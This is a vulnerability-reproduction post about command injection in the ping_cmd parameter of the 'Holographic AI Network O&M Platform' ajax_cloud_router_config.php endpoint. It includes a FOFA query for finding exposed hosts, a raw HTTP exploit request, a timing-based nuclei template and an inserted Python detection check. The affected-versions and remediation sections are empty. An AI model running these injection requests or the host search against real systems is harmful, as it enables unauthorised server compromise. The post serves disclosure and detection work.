Holographic AI Network O&M Platform (全息AI网络运维平台) ajax_cloud_router_config Command Execution

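0x01 Product Overview

TG万网博通 follows an innovation philosophy in which technology drives the use case. In 2015 it was the first company in China to launch the "Holographic AI Low-Voltage Network Integrated O&M Platform", based on artificial intelligence and deep learning, a first for AI-driven intelligent low-voltage networks. In 2017 it was the first in China to launch the "Holographic AI Security Network Dedicated Platform", built specifically for video network systems, which became a benchmark network transmission product in the security industry. Building on this technical strength, the Holographic AI platform and its solutions have been deployed in national and provincial key projects including the Beijing Winter Olympics, the Beijing International Horticultural Exhibition, Beijing Daxing International Airport, Tsinghua University, the Affiliated Hospital of the University of South China, Xi'an Metro, and Changsha Rural Commercial Bank.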

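0x02 Vulnerability Description

The nmss/cloud/Ajax/ajax_cloud_router_config.php endpoint of the Holographic AI Network O&M Platform has a command execution vulnerability that leads to compromise of the server.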

0x03 Affected Versions

0x04 Search Syntax

FOFA

```
"全息AI网络运维平台" && icon_hash="557768162"
```

0x05 Vulnerability Reproduction

System login page

Exploit PoC

```http
POST /nmss/cloud/Ajax/ajax_cloud_router_config.php HTTP/1.1
Host:
Content-Length: 24
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Connection: close

ping_cmd=8.8.8.8|sleep%2b6
```
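A defensive check for the request shown above, as an added example that is not part of the original post or the vendor's code: it flags POSTs to the endpoint whose decoded `ping_cmd` value is anything other than a bare IP address or hostname. The sample records are constructed, and the allow-list rule is an assumption about what the parameter legitimately carries.

```python
import ipaddress
import re
from urllib.parse import parse_qs

ENDPOINT = "/nmss/cloud/Ajax/ajax_cloud_router_config.php"  # path from the PoC above
PARAM = "ping_cmd"                                           # parameter from the PoC above
# RFC 1123 style hostname: labels of letters, digits and hyphens separated by dots.
HOSTNAME_RE = re.compile(
    r"(?=.{1,253}\Z)([A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*\Z"
)

def is_plain_ping_target(value: str) -> bool:
    """Allow-list check (assumed rule): True only for a bare IP address or hostname."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return HOSTNAME_RE.match(value) is not None

def suspicious_values(method: str, path: str, body: str) -> list[str]:
    """Return the decoded ping_cmd values that are not a plain ping target."""
    if method.upper() != "POST" or path.split("?", 1)[0] != ENDPOINT:
        return []
    # parse_qs URL-decodes the form body, so encoded metacharacters are seen in clear.
    fields = parse_qs(body, keep_blank_values=True)
    return [v for v in fields.get(PARAM, []) if not is_plain_ping_target(v)]

# Constructed sample records (method, path, form body); not captured traffic.
SAMPLES = [
    ("POST", ENDPOINT, "ping_cmd=8.8.8.8"),
    ("POST", ENDPOINT, "ping_cmd=gw.example.internal"),
    ("POST", ENDPOINT, "ping_cmd=8.8.8.8|sleep%2b6"),  # body from the PoC above
    ("POST", "/index.php", "ping_cmd=8.8.8.8|sleep%2b6"),  # different endpoint, ignored
]

if __name__ == "__main__":
    for method, path, body in SAMPLES:
        hits = suspicious_values(method, path, body)
        print("ALERT" if hits else "ok   ", path, hits)
```

The same allow-list can be applied server-side before the value reaches any shell, or run over proxy or WAF logs that record request bodies.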

nuclei PoC

```yaml
id: quan_xi_ai_wang_luo_yun_wei_ping_tai_ajax_cloud_router_config-rce

info:
  name: 全息AI网络运维平台ajax_cloud_router_config-rce
  author: admin
  severity: high
  tags: 全息AI,网络运维平台,ajax_cloud_router_config,rce

http:
  - raw:
      - |
        POST /nmss/cloud/Ajax/ajax_cloud_router_config.php HTTP/1.1
        Host: {{Hostname}}
        Content-Length: 24
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
        Content-Type: application/x-www-form-urlencoded
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Connection: close

        ping_cmd=8.8.8.8|sleep%2b4

      - |
        POST /nmss/cloud/Ajax/ajax_cloud_router_config.php HTTP/1.1
        Host: {{Hostname}}
        Content-Length: 24
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
        Content-Type: application/x-www-form-urlencoded
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Connection: close

        ping_cmd=8.8.8.8|sleep%2b6

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'duration_1>=4 && duration_1<=6'
          - 'duration_2>=6 && duration_2<=8'
```


0x06 Remediation


Source: https://tsy244.github.io/2024/08/13/漏洞复现/全息AI网络运维平台ajax-cloud-router-config命令执行/
Author: August Rosenberg
Posted on: August 13, 2024